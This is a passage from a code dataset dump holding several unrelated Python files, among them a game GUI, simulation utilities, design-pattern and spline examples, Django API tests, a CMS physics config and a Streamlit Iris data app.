+ 20, y + 35, 100, int((100 * (float(p1.debuffs[index].time) / p1.ab1cooldown))) + 1)\n \n index = -1\n for i in range(0,len(Game.PT.players[self.playerSlot].debuffs)):\n if(Game.PT.players[self.playerSlot].debuffs[i].debuff == \"ab2cd\"):\n index = int(i)\n break\n if(index != -1):\n rect(x + 850 + 130, y + 35, 100, int((100 * (float(p1.debuffs[index].time) / p1.ab2cooldown))) + 1) \n \n textAlign(CENTER)\n fill(255)\n \n # Teacher name\n textSize(40)\n text(p1.name, x + w/2, y + 45)\n \n # Health bar text\n textSize(25)\n text(str(int(p1.hp)) + \"/\" + str(p1.hpMax), x + 550, y + 105)\n \n # Experience bar text\n if(self.type == \"player\"):\n text(\"Level \" + str(p1.lvl), x + 125, y + 105)\n \n # Ability name text\n textSize(12)\n text(p1.ab1name, x + 850 + 20 + 50, y + 30)\n text(p1.ab2name, x + 850 + 130 + 50, y + 30)\n \n # Frames per second\n textSize(12)\n fill(0,0,0, 100)\n text(int(frameRate), 10 - Cam.xshift, 10 - Cam.yshift)\n \n # End of game message\n if Game.ST.structures[0].hp <= 0 or Game.ST.structures[9].hp <= 0:\n textSize(128)\n textAlign(CENTER, CENTER)\n if Game.ST.structures[9].hp <= 0 and Game.ST.structures[0].hp <= 0:\n fill (0, 255, 0)\n text(\"Both Nexuses are dead. Check with server for winner\", x+540, y-480)\n elif Game.ST.structures[9].hp <= 0:\n fill(0, 0, 255)\n text(\"Blue Alliance Wins. Check with server if close\", x+540, y-480)\n elif Game.ST.structures[0]:\n fill(255, 0, 0)\n text(\"Red Alliance Wins\", x+540, y-480)\n","sub_path":"src/Client/Driver/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":4414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"605387735","text":"\"\"\" Simulation core utilities\n\n:Author: Arthur Goldberg \n:Date: 2018-02-26\n:Copyright: 2018, Karr Lab\n:License: MIT\n\"\"\"\nfrom abc import ABCMeta, abstractmethod\n\n\nclass ConcreteABCMeta(ABCMeta):\n \"\"\" A concrete subclass of ABCMeta that's used to combine meta classes\n\n In particular, this makes it easy to create a \"most derived metaclass\" that includes\n ABCMetas and a custom Meta, and avoid \"TypeError: metaclass conflict\".\n\n See https://docs.python.org/3/reference/datamodel.html#determining-the-appropriate-metaclass,\n PEP 3119 and https://stackoverflow.com/a/31429212\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n if self.__abstractmethods__:\n raise TypeError(\"{} has not implemented abstract methods {}\".format(\n self.__name__, \", \".join(self.__abstractmethods__)))\n","sub_path":"wc_sim/core/ignore/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"282797193","text":"\"\"\"\r\nMonostate (ou Borg) - É uma variação do singleton que tem a intenção de garantir que o estado do objeto\r\nseja igual para todas as instâncias. O monostate é melhor para se trabalhar com heranças, isso ao ser relacionado\r\ncom o singleton.\r\n\r\n\"\"\"\r\n\r\nclass StringReprMixin:\r\n def __str__(self):\r\n params = ', '.join([f'{k}={v}' for k, v in self.__dict__.items()])\r\n return f'{self.__class__.__name__}({params})'\r\n\r\n def __repr__(self):\r\n return self.__str__()\r\n\r\nclass MonoStateSimple(StringReprMixin):\r\n _state = {'x': 10,'y': 20}\r\n\r\n def __init__(self, nome=None):\r\n self.__dict__ = self._state\r\n\r\n if nome is not None:\r\n self.nome = nome\r\n \r\nif __name__ == \"__main__\":\r\n m1 = MonoStateSimple()\r\n m2 = MonoStateSimple()\r\n print(m1)\r\n print(m2)","sub_path":"DesignPatterns/monostate_1.py","file_name":"monostate_1.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"424807082","text":"import math\nimport numpy as np\n\ndelta = 0.05 #shifts initial max thickness aft\nPIRAD = 3.14159\nTWOPI = 2 * PIRAD\nRqD = PIRAD / 180\n\nNp = 6 #number of points\ntau_S = np.array(np.zeros(Np)) #plus one because 1 to n is preferred\nzet_S = np.array(np.zeros(Np))\nchi_S = np.array(np.zeros(Np))\n\n#these points are USER INPUTS\ntau_S[0] = 0.00\ntau_S[1] = 0.03\ntau_S[2] = 0.19\ntau_S[3] = 0.50\ntau_S[4] = 0.88\ntau_S[5] = 1.00\n\nzet_S[0] = 0.00\nzet_S[1] = 0.0007\nzet_S[2] = -0.049\nzet_S[3] = 0.00\nzet_S[4] = 0.0488\nzet_S[5] = 0.00\n\nLeft_to_Right = 1\nn = Np - 1\nc = np.array(np.zeros(n))\nX = np.array(np.zeros(Np))\nY = np.array(np.zeros(Np))\n\nfor i in range(0,Np):\n X[i] = tau_S[i]\n Y[i] = zet_S[i]\n\n#call polynomial\nXo = X[0]\nYo = Y[0]\nXn = X[n]\nYn = Y[n]\n\nA = np.matrix(np.zeros((n,n)))\nB = np.matrix(np.zeros((n,1)))\n\nfor i in range(0, n):\n if(Left_to_Right == 1):\n B[i] = Y[i+1] - Yo\n else:\n B[i] = Y[n-i] - Yn\n for j in range(0, n):\n if(Left_to_Right == 1):\n A[i,j] = (X[i+1] - Xo) ** (j+1)\n else:\n A[i,j] = (X[n] - Xn) ** (j+1)\n\n#call gauss and solve\n\ncoefficient = np.linalg.solve(A,B)\ny_equation = \"1-(1-\"+str(delta)+\")*sin(pi*u)+\"+str(delta)+\"*sin(3*pi*u)\"\n\nz_equation = \"\"\nfor i in range(1,n+1):\n z_equation = z_equation + str(coefficient.item(i-1)) + \"*u**\"+str(i)\n if(i != n):\n z_equation = z_equation + \"+\"\n\nprint(z_equation)\nprint(y_equation)\n","sub_path":"legacy/Parametric_Cubic_Spline.py","file_name":"Parametric_Cubic_Spline.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"117661068","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom numpy import pi\nfrom numpy.random import random, seed\nfrom modules.growth import spawn, spawn_curl\n\nNMAX = 10**7\nSIZE = 10000\nONE = 1./SIZE\n\nRAD = 0.1\n\nSTP = ONE*0.5\nNEARL = 4*ONE\nFARL = 200*ONE\n\nPROCS = 6\n\nMID = 0.5\n\nLINEWIDTH = 5.*ONE\n\nSTEPS_ITT = 500\nNINIT = 20\n\nBACK = [1,1,1,1]\nFRONT = [0,0,0,1]\n\nTWOPI = pi*2.\n\n\ndef steps(df,steps_itt):\n\n for i in xrange(steps_itt):\n\n df.optimize_avoid(STP)\n spawn_curl(df,NEARL)\n\n\ndef main():\n\n from time import time\n from itertools import count\n\n from render.render import Render\n from modules.helpers import print_stats\n from modules.show import show\n from modules.show import show_closed\n\n from differentialLine import DifferentialLine\n\n\n DF = DifferentialLine(NMAX, FARL*2, NEARL, FARL, PROCS)\n\n render = Render(SIZE, BACK, FRONT)\n\n render.ctx.set_source_rgba(*FRONT)\n render.ctx.set_line_width(LINEWIDTH)\n\n angles = sorted(random(NINIT))\n\n DF.init_circle_segment(MID,MID,RAD, angles)\n\n\n for i in count():\n\n t_start = time()\n\n steps(DF,STEPS_ITT)\n\n t_stop = time()\n\n print_stats(i*STEPS_ITT,t_stop-t_start,DF)\n\n fn = './res/oryx_bb_{:010d}.png'.format(i*STEPS_ITT)\n edges_coordinates = DF.get_edges_coordinates()\n show(render,edges_coordinates,fn)\n\n\n fn = './res/oryx_bb_closed_{:010d}.png'.format(i*STEPS_ITT)\n sorted_vert_coordinates = DF.get_sorted_vert_coordinates()\n show_closed(render,sorted_vert_coordinates,fn)\n\n\nif __name__ == '__main__':\n\n if False:\n\n import pyximport\n pyximport.install()\n import pstats, cProfile\n\n fn = './profile/profile'\n cProfile.runctx(\"main()\", globals(), locals(), fn)\n p = pstats.Stats(fn)\n p.strip_dirs().sort_stats('cumulative').print_stats()\n\n else:\n\n main()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"161366362","text":"\"\"\"\nTests for submissions API.\n\"\"\"\nimport json\n\nfrom stars.apps.api.test import ReadOnlyResourceTestCase\n\nfrom stars.apps.submissions.models import (CategorySubmission,\n CreditUserSubmission,\n LongTextSubmission,\n SubcategorySubmission,\n SubmissionSet)\n\n\nsubmissions_list_path = '/api/0.1/submissions/'\n\n\ndef submissions_detail_path(submissionset_id):\n return '{list_path}{submissionset_id}/'.format(\n list_path=submissions_list_path,\n submissionset_id=submissionset_id)\n\n\nRATED_SUBMISSIONSET_ID = 75\nUNRATED_SUBMISSIONSET_ID = 688\nLOCKED_SUBMISSIONSET_ID = 429\nRATED_NON_REPORTER_SUBMISSIONSET_ID = RATED_SUBMISSIONSET_ID\nRATED_REPORTER_SUBMISSIONSET_ID = 113\n\n\nclass SubmissionSetResourceTestCase(ReadOnlyResourceTestCase):\n\n __test__ = True # Override ReadOnlyResourceTestCase.__test__ for nose.\n\n detail_path = submissions_detail_path(RATED_SUBMISSIONSET_ID)\n list_path = submissions_list_path\n\n def test_get_submissions_list_requires_auth(self):\n self.requires_auth(self.list_path)\n\n def test_get_submissions_list(self):\n resp = self.get(self.list_path)\n self.assertValidJSONResponse(resp)\n\n def test_get_submissions_detail_requires_auth(self):\n self.requires_auth(self.detail_path)\n\n def test_get_submissions_detail(self):\n resp = self.get(self.detail_path)\n self.assertValidJSONResponse(resp)\n\n def test_get_unrated_submission(self):\n # Get a submission set that should be filtered:\n resp = self.get(submissions_detail_path(UNRATED_SUBMISSIONSET_ID))\n self.assertHttpNotFound(resp)\n\n def test_unrated_submissions_are_hidden(self):\n resp = self.get(self.list_path + '?limit=0')\n payload = json.loads(resp.content)\n visible_submissionsets = payload['objects']\n visible_submissionset_ids = [ss['id'] for ss\n in visible_submissionsets]\n self.assertNotIn(UNRATED_SUBMISSIONSET_ID,\n visible_submissionset_ids)\n\n def test_get_locked_submission(self):\n # Get a submission set that should be filtered:\n resp = self.get(submissions_detail_path(LOCKED_SUBMISSIONSET_ID))\n self.assertHttpNotFound(resp)\n\n def test_locked_submissions_are_hidden(self):\n resp = self.get(self.list_path + '?limit=0')\n payload = json.loads(resp.content)\n visible_submissionsets = payload['objects']\n visible_submissionset_ids = [ss['id'] for ss\n in visible_submissionsets]\n self.assertNotIn(LOCKED_SUBMISSIONSET_ID,\n visible_submissionset_ids)\n\n def test_rated_unlocked_submissions_are_visible(self):\n resp = self.get(self.list_path + '?limit=0')\n payload = json.loads(resp.content)\n visible_submissionsets = payload['objects']\n visible_submissionset_ids = [ss['id'] for ss\n in visible_submissionsets]\n rated_submissionset_ids = [\n submissionset.id\n for submissionset in\n SubmissionSet.objects.get_rated().filter(is_locked=False)]\n self.assertItemsEqual(visible_submissionset_ids,\n rated_submissionset_ids)\n\n def test_scoring_hidden_for_reporter(self):\n path = submissions_detail_path(RATED_REPORTER_SUBMISSIONSET_ID)\n resp = self.get(path)\n payload = json.loads(resp.content)\n self.assertTrue(payload['score'] is None)\n\n def test_scoring_shown_for_non_reporter(self):\n path = submissions_detail_path(RATED_NON_REPORTER_SUBMISSIONSET_ID)\n resp = self.get(path)\n payload = json.loads(resp.content)\n self.assertFalse(payload['score'] is None)\n\n\nclass CategorySubmissionResourceTestCase(ReadOnlyResourceTestCase):\n\n __test__ = True # Override ReadOnlyResourceTestCase.__test__ for nose.\n\n RATED_CATEGORYSUBMISSION_ID = 91\n UNRATED_CATEGORYSUBMISSION_ID = 2176\n\n # detail_path and list_path are defined for\n # ReadOnlyResourceTestCase tests.\n\n @property\n def list_path(self):\n return self._list_path(rated_submissionset=True)\n\n @property\n def detail_path(self):\n return self._detail_path(rated_submissionset=True)\n\n def _list_path(self, rated_submissionset):\n \"\"\"rated_submissionset is True or False.\"\"\"\n submissionset_id = (RATED_SUBMISSIONSET_ID if rated_submissionset\n else UNRATED_SUBMISSIONSET_ID)\n return submissions_detail_path(submissionset_id) + 'category/'\n\n def _detail_path(self, rated_submissionset):\n \"\"\"Detail URI for one CategorySubmission of a SubmissionSet.\n The CategorySubmission belongs to a SubmissionSet that's rated\n if rated_submissionset is True, otherwise it belongs to an unrated\n SubmissionSet.\n \"\"\"\n catsub_id = (\n self.RATED_CATEGORYSUBMISSION_ID if rated_submissionset\n else self.UNRATED_CATEGORYSUBMISSION_ID)\n return (self._list_path(rated_submissionset) +\n self.detail_path_part(catsub_id))\n\n def detail_path_part(self, categorysubmission_id):\n \"\"\"Detail part of path for a specific CategorySubmission.\"\"\"\n categorysubmission = CategorySubmission.objects.get(\n pk=categorysubmission_id)\n return str(categorysubmission.category.id) + '/'\n\n def test_get_categorysubmission_list_requires_auth(self):\n self.requires_auth(self._list_path(rated_submissionset=True))\n\n def test_get_categorysubmission_list(self):\n resp = self.get(self._list_path(rated_submissionset=True))\n self.assertValidJSONResponse(resp)\n\n def test_get_categorysubmission_detail_requires_auth(self):\n self.requires_auth(self._detail_path(rated_submissionset=True))\n\n def test_get_categorysubmission_detail(self):\n path = self._detail_path(rated_submissionset=True)\n resp = self.get(path)\n self.assertValidJSONResponse(resp)\n\n def test_get_categorysubmission_for_unrated_submissionset(self):\n path = self._detail_path(rated_submissionset=False)\n resp = self.get(path)\n self.assertHttpGone(resp)\n\n\nclass SubcategorySubmissionResourceTestCase(ReadOnlyResourceTestCase):\n\n # TODO - add test for UNRATED_SUBCATEGORYSUBMISSION_ID?\n\n __test__ = True # Override ReadOnlyResourceTestCase.__test__ for nose.\n\n RATED_SUBCATEGORYSUBMISSION_ID = 429\n UNRATED_SUBCATEGORYSUBMISSION_ID = None\n RATED_NON_REPORTER_SUBCATEGORYSUBMISSION_WITH_POINTS_ID = (\n RATED_SUBCATEGORYSUBMISSION_ID)\n RATED_REPORTER_SUBCATEGORYSUBMISSION_WITH_POINTS_ID = 1291\n\n # detail_path and list_path are defined for\n # ReadOnlyResourceTestCase tests.\n\n @property\n def list_path(self):\n return self._list_path(rated_submissionset=True)\n\n @property\n def detail_path(self):\n return self._detail_path(rated_submissionset=True)\n\n def _list_path(self, rated_submissionset):\n \"\"\"List URI for the SubcategorySubmissions of a SubmissionSet.\n The SubcategorySubmissions belong to a SubmissionSet that's rated\n if rated_submissionset is True, otherwise they belong to an unrated\n SubmissionSet.\n \"\"\"\n submissionset_id = (RATED_SUBMISSIONSET_ID if rated_submissionset\n else UNRATED_SUBMISSIONSET_ID)\n return self.list_path_for_submissionset(submissionset_id)\n\n def list_path_for_submissionset(self, submissionset_id):\n return submissions_detail_path(submissionset_id) + 'subcategory/'\n\n def _detail_path(self, rated_submissionset):\n \"\"\"Detail URI for one SubcategorySubmission of a SubmissionSet.\n The SubcategorySubmission belongs to a SubmissionSet that's rated\n if rated_submissionset is True, otherwise it belongs to an unrated\n SubmissionSet.\n \"\"\"\n subcatsub_id = (\n self.RATED_SUBCATEGORYSUBMISSION_ID if rated_submissionset\n else self.UNRATED_SUBCATEGORYSUBMISSION_ID)\n return (self._list_path(rated_submissionset) +\n self.detail_path_part(subcatsub_id))\n\n def detail_path_part(self, subcategorysubmission_id):\n \"\"\"Part of detail path for a specific SubcategorySubmission.\"\"\"\n subcategorysubmission = SubcategorySubmission.objects.get(\n pk=subcategorysubmission_id)\n return str(subcategorysubmission.subcategory.id) + '/'\n\n def test_get_subcategorysubmission_list_requires_auth(self):\n self.requires_auth(self._list_path(rated_submissionset=True))\n\n def test_get_subcategorysubmission_list(self):\n resp = self.get(self._list_path(rated_submissionset=True))\n self.assertValidJSONResponse(resp)\n\n def test_get_subcategorysubmission_detail_requires_auth(self):\n self.requires_auth(self._detail_path(rated_submissionset=True))\n\n def test_get_subcategorysubmission_detail(self):\n path = self._detail_path(rated_submissionset=True)\n resp = self.get(path)\n self.assertValidJSONResponse(resp)\n\n def test_dehydrate_points(self):\n\n # Make sure points aren't None for everybody:\n path = (\n self.list_path_for_submissionset(\n RATED_NON_REPORTER_SUBMISSIONSET_ID) +\n self.detail_path_part(\n self.RATED_NON_REPORTER_SUBCATEGORYSUBMISSION_WITH_POINTS_ID))\n\n resp = self.get(path)\n\n self.assertValidJSONResponse(resp)\n payload = json.loads(resp.content)\n self.assertTrue(payload['points'] is not None)\n\n # Now check that they're None for reporters:\n path = (\n self.list_path_for_submissionset(\n RATED_REPORTER_SUBMISSIONSET_ID) +\n self.detail_path_part(\n self.RATED_REPORTER_SUBCATEGORYSUBMISSION_WITH_POINTS_ID))\n\n resp = self.get(path)\n\n self.assertValidJSONResponse(resp)\n payload = json.loads(resp.content)\n self.assertTrue(payload['points'] is None)\n\n\nclass CreditSubmissionResourceTestCase(ReadOnlyResourceTestCase):\n\n # TODO - add test for UNRATED_CREDITSUBMISSION_ID?\n\n __test__ = True # Override ReadOnlyResourceTestCase.__test__ for nose.\n\n RATED_CREDITSUBMISSION_ID = 3475\n UNRATED_CREDITSUBMISSION_ID = None\n\n # detail_path and list_path are defined for\n # ReadOnlyResourceTestCase tests.\n\n @property\n def list_path(self):\n return self._list_path(rated_submissionset=True)\n\n @property\n def detail_path(self):\n return self._detail_path(rated_submissionset=True)\n\n def _list_path(self, rated_submissionset):\n \"\"\"List URI for the CreditSubmissions of a SubmissionSet.\n The CreditSubmissions belong to a SubmissionSet that's rated\n if rated_submissionset is True, otherwise they belong to an unrated\n SubmissionSet.\n \"\"\"\n submissionset_id = (RATED_SUBMISSIONSET_ID if rated_submissionset\n else UNRATED_SUBMISSIONSET_ID)\n return submissions_detail_path(submissionset_id) + 'credit/'\n\n def _detail_path(self, rated_submissionset):\n \"\"\"Detail URI for one CreditSubmission of a SubmissionSet.\n The CreditSubmission belongs to a SubmissionSet that's rated\n if rated_submissionset is True, otherwise it belongs to an unrated\n SubmissionSet.\n \"\"\"\n creditsubmission_id = (\n self.RATED_CREDITSUBMISSION_ID if rated_submissionset\n else self.UNRATED_CREDITSUBMISSION_ID)\n creditsubmission = CreditUserSubmission.objects.get(\n pk=creditsubmission_id)\n return (self._list_path(rated_submissionset) +\n str(creditsubmission.credit.id) + '/')\n\n def test_get_creditsubmission_list_requires_auth(self):\n self.requires_auth(self._list_path(rated_submissionset=True))\n\n def test_get_creditsubmission_list(self):\n resp = self.get(self._list_path(rated_submissionset=True))\n self.assertValidJSONResponse(resp)\n\n def test_get_creditsubmission_detail_requires_auth(self):\n self.requires_auth(self._detail_path(rated_submissionset=True))\n\n def test_get_creditsubmission_detail(self):\n path = self._detail_path(rated_submissionset=True)\n resp = self.get(path)\n self.assertValidJSONResponse(resp)\n\n\nclass DocumentationFieldSubmissionResourceTestCase(ReadOnlyResourceTestCase):\n\n # TODO - add test for UNRATED_DOCUMENTATIONFIELDSUBMISSION_ID?\n\n __test__ = True # Override ReadOnlyResourceTestCase.__test__ for nose.\n\n RATED_DOCUMENTATIONFIELDSUBMISSION_ID = 10345\n UNRATED_DOCUMENTATIONFIELDSUBMISSION_ID = None\n\n # For ReadOnlyResourceTestCase tests, list_path and must be defined:\n list_path = None\n\n # For ReadOnlyResourceTestCase tests, detail_path and must be available\n # as an attribute of the class, not a method:\n @property\n def detail_path(self):\n return self._detail_path(rated_submissionset=True)\n\n def _detail_path(self, rated_submissionset):\n \"\"\"Detail URI for one DocumentationFieldSubmission of a\n SubmissionSet. The DocumentationFieldSubmission belongs to a\n SubmissionSet that's rated if rated_submissionset is True,\n otherwise it belongs to an unrated SubmissionSet.\n \"\"\"\n submissionset_id = (RATED_SUBMISSIONSET_ID if rated_submissionset\n else UNRATED_SUBMISSIONSET_ID)\n documenatationfieldsubmission_id = (\n self.RATED_DOCUMENTATIONFIELDSUBMISSION_ID if rated_submissionset\n else self.UNRATED_DOCUMENTATIONFIELDSUBMISSION_ID)\n documentationfieldsubmission = LongTextSubmission.objects.get(\n pk=documenatationfieldsubmission_id)\n return (submissions_detail_path(submissionset_id) + 'field/' +\n str(documentationfieldsubmission.documentation_field.id) + '/')\n\n def test_get_documentationfieldsubmission_detail_requires_auth(self):\n self.requires_auth(self.detail_path)\n\n def test_get_documentationfieldsubmission_detail(self):\n resp = self.get(self.detail_path)\n self.assertValidJSONResponse(resp)\n","sub_path":"stars/apps/submissions/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":14329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"313318702","text":"#!/usr/bin/env cmsRun\n\nimport FWCore.ParameterSet.Config as cms\nimport FWCore.Utilities.FileUtils as FileUtils\nfrom flashgg.Systematics.SystematicDumperDefaultVariables import minimalVariables,minimalHistograms\n\n# SYSTEMATICS SECTION\n\nprocess = cms.Process(\"FLASHggSyst\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nprocess.load(\"Configuration.StandardSequences.GeometryDB_cff\")\nprocess.load(\"Configuration.StandardSequences.MagneticField_cff\")\nprocess.load(\"Configuration.StandardSequences.FrontierConditions_GlobalTag_cff\")\nprocess.GlobalTag.globaltag = 'POSTLS170_V5::All'\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(100) )\nprocess.MessageLogger.cerr.FwkReport.reportEvery = cms.untracked.int32( 10 )\n\nprocess.RandomNumberGeneratorService = cms.Service(\"RandomNumberGeneratorService\",\n flashggDiPhotonSystematics = cms.PSet(initialSeed = cms.untracked.uint32(664)),\n flashggElectronSystematics = cms.PSet(initialSeed = cms.untracked.uint32(11)),\n flashggMuonSystematics = cms.PSet(initialSeed = cms.untracked.uint32(13))\n )\n\nprocess.load(\"flashgg.Systematics.flashggDiPhotonSystematics_cfi\")\nprocess.load(\"flashgg.Systematics.flashggMuonSystematics_cfi\")\nprocess.load(\"flashgg.Systematics.flashggElectronSystematics_cfi\")\nprocess.load(\"flashgg/Taggers/flashggTagSequence_cfi\")\nprocess.load(\"flashgg/Taggers/flashggTagTester_cfi\")\n\nfrom PhysicsTools.PatAlgos.tools.helpers import cloneProcessingSnippet,massSearchReplaceAnyInputTag\nmassSearchReplaceAnyInputTag(process.flashggTagSequence,cms.InputTag(\"flashggDiPhotons\"),cms.InputTag(\"flashggDiPhotonSystematics\"))\nmassSearchReplaceAnyInputTag(process.flashggTagSequence,cms.InputTag(\"flashggSelectedElectrons\"),cms.InputTag(\"flashggElectronSystematics\"))\nmassSearchReplaceAnyInputTag(process.flashggTagSequence,cms.InputTag(\"flashggSelectedMuons\"),cms.InputTag(\"flashggMuonSystematics\"))\n\nprocess.flashggSystTagMerger = cms.EDProducer(\"TagMerger\",src=cms.VInputTag(\"flashggTagSorter\"))\n\nprocess.systematicsTagSequences = cms.Sequence()\nsystlabels = [\"\"]\nfor r9 in [\"HighR9\",\"LowR9\"]:\n for direction in [\"Up\",\"Down\"]:\n systlabels.append(\"MCSmear%sEE%s01sigma\" % (r9,direction))\n for var in [\"Rho\",\"Phi\"]:\n systlabels.append(\"MCSmear%sEB%s%s01sigma\" % (r9,var,direction))\n for region in [\"EB\",\"EE\"]:\n systlabels.append(\"MCScale%s%s%s01sigma\" % (r9,region,direction))\n\nfor systlabel in systlabels:\n if systlabel == \"\":\n continue\n newseq = cloneProcessingSnippet(process,process.flashggTagSequence,systlabel)\n massSearchReplaceAnyInputTag(newseq,cms.InputTag(\"flashggDiPhotonSystematics\"),cms.InputTag(\"flashggDiPhotonSystematics\",systlabel))\n for name in newseq.moduleNames():\n module = getattr(process,name)\n if hasattr(module,\"SystLabel\"):\n module.SystLabel = systlabel\n process.systematicsTagSequences += newseq\n process.flashggSystTagMerger.src.append(cms.InputTag(\"flashggTagSorter\" + systlabel))\n\n###### Dumper section\n\nfrom FWCore.ParameterSet.VarParsing import VarParsing\nfrom flashgg.MetaData.samples_utils import SamplesManager\n\n## CMD LINE OPTIONS ##\n#options = VarParsing('analysis')\n#print options\n\n# maxEvents is the max number of events processed of each file, not globally\n#options.maxEvents = -1\n#options.inputFiles = \"file:myMicroAODOutputFile.root\"\n#options.outputFile = \"ValidationTagsDump.root\"\n#options.parseArguments()\n\nprocess.source = cms.Source (\"PoolSource\",\n fileNames = cms.untracked.vstring(\"file:myMicroAODOutputFile.root\"))\n\n#if options.maxEvents > 0:\n# process.source.eventsToProcess = cms.untracked.VEventRange('1:1-1:'+str(options.maxEvents))\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = cms.string(\"test.root\"))\n\nprocess.extraDumpers = cms.Sequence()\nprocess.load(\"flashgg.Taggers.diphotonTagDumper_cfi\") ## import diphotonTagDumper \nimport flashgg.Taggers.dumperConfigTools as cfgTools\n\nprocess.tagsDumper.className = \"DiPhotonTagDumper\"\nprocess.tagsDumper.src = \"flashggSystTagMerger\"\nprocess.tagsDumper.processId = \"test\"\nprocess.tagsDumper.dumpTrees = True\nprocess.tagsDumper.dumpWorkspace = True\nprocess.tagsDumper.dumpHistos = False\nprocess.tagsDumper.quietRooFit = True\nprocess.tagsDumper.nameTemplate = cms.untracked.string(\"$PROCESS_$SQRTS_$CLASSNAME_$SUBCAT_$LABEL\")\n\ntagList=[\n[\"UntaggedTag\",5],\n[\"VBFTag\",3],\n[\"VHTightTag\",0],\n[\"VHLooseTag\",0],\n[\"VHEtTag\",0],\n[\"VHHadronicTag\",0],\n[\"TTHHadronicTag\",0],\n[\"TTHLeptonicTag\",0]\n]\n\ndefinedSysts=set()\nprocess.tagsDumper.classifierCfg.remap=cms.untracked.VPSet()\nfor tag in tagList: \n tagName=tag[0]\n tagCats=tag[1]\n # remap return value of class-based classifier\n process.tagsDumper.classifierCfg.remap.append( cms.untracked.PSet( src=cms.untracked.string(\"flashgg%s\"%tagName), dst=cms.untracked.string(tagName) ) )\n for systlabel in systlabels:\n if not systlabel in definedSysts:\n # the cut corresponding to the systematics can be defined just once\n cutstring = \"hasSyst(\\\"%s\\\") \"%(systlabel)\n definedSysts.add(systlabel)\n else:\n cutstring = None\n cfgTools.addCategory(process.tagsDumper,\n systlabel,\n classname=tagName,\n cutbased=cutstring,\n subcats=tagCats, \n variables=minimalVariables,\n histograms=minimalHistograms\n )\n\nprocess.p = cms.Path((process.flashggDiPhotonSystematics+process.flashggMuonSystematics+process.flashggElectronSystematics)*\n (process.flashggTagSequence+process.systematicsTagSequences)*\n process.flashggSystTagMerger\n * process.tagsDumper)\n\n\n\n############################\n## Dump the output Python ##\n############################\nprocessDumpFile = open('processDump.py', 'w')\nprint >> processDumpFile, process.dumpPython()\n\n\n\n# import flashgg customization\nfrom flashgg.MetaData.JobConfig import customize\n# set default options if needed\ncustomize.setDefault(\"maxEvents\",-1)\ncustomize.setDefault(\"targetLumi\",20e+3)\n# call the customization\ncustomize(process)\n","sub_path":"Systematics/test/MicroAODtoWorkspace.py","file_name":"MicroAODtoWorkspace.py","file_ext":"py","file_size_in_byte":6445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"339482215","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Aug 3 20:38:55 2020\r\n\r\n@author: Willi\r\n\"\"\"\r\n# Run en linea de comandos: !streamlit run IRIS_APP.py\r\n\r\n\r\nimport streamlit as st\r\n\r\n# EDA \r\nimport pandas as pd \r\nimport matplotlib.pyplot as plt \r\nimport seaborn as sns \r\nfrom PIL import Image\r\n#-------------------------------------------------------------\r\n#Title\r\nst.title(\"IRIS EDA \")\r\nst.header(\"Streamlit App\")\r\n#-------------------------------------------------------------\r\n# Dataframe\r\n\r\npath = \"Iris.csv\"\r\n#-------------------------------------------------------------\r\n@st.cache\r\ndef load_data(path):\r\n data = pd.read_csv(path)\r\n return data \r\ndata = load_data(path)\r\n#-------------------------------------------------------------\r\n\r\nif st.sidebar.checkbox(\"Preview Dataset\"):\r\n if st.button(\"Head\"):\r\n st.write(data.head())\r\n if st.button(\"Tail\"):\r\n st.write(data.tail())\r\n\r\n#------------------------------------------------------------- \r\nif st.sidebar.checkbox(\"Show ALL dataset\"):\r\n st.write(data)\r\n#------------------------------------------------------------- \r\n# Column Names\r\nif st.sidebar.checkbox(\"Show Column Names\"):\r\n st.write(data.columns)\r\n#-------------------------------------------------------------\r\n#Summary\r\nif st.sidebar.checkbox(\"Show summary\"):\r\n st.write(data.describe())\r\n \r\n \r\n#-------------------------------------------------------------\r\nd = [\"Rows\",\"Columns\",\"ALL\"]\r\ndata_dim = st.sidebar.radio(\"Select Dimensions to see:\",tuple(d))\r\n\r\nfor i in d:\r\n if data_dim == i:\r\n # st.text(f\"Showing {i}\")\r\n \r\n if i == \"ALL\":\r\n st.header(f\"Shape {i} : {data.shape}\")\r\n else:\r\n st.header(f\"Shape {i} : {data.shape[d.index(i)]}\")\r\n \r\n \r\nif st.sidebar.checkbox(\"Show Correlations \"):\r\n corr = data.corr()\r\n cmap = plt.cm.RdBu\r\n plt.title('Correlación Pearson', size=15)\r\n st.write(sns.heatmap(corr, cmap=cmap, annot=True, linewidths=1))\r\n st.pyplot()\r\n\r\n\r\n#-------------------------------------------------------------\r\nif st.sidebar.checkbox(\"Show columns\"):\r\n # Select Column:\r\n columnas = data.columns\r\n col = st.sidebar.selectbox(\"Select Column\",tuple(columnas))\r\n st.write(data[col])\r\n \r\n #-------------------------------------------------------------\r\n if st.sidebar.checkbox(\"Show Histogram: \"):\r\n st.write(data[col].plot(kind=\"hist\"))\r\n st.pyplot()\r\n \r\n#-------------------------------------------------------------\r\n@st.cache\r\ndef load_image(path):\r\n imagen = Image.open(path)\r\n return imagen\r\n \r\n\r\ntipos = data[\"Species\"].unique()\r\nspecies_type = st.sidebar.radio(\"Select type: \", tuple(tipos))\r\nst.title(f\"Showing 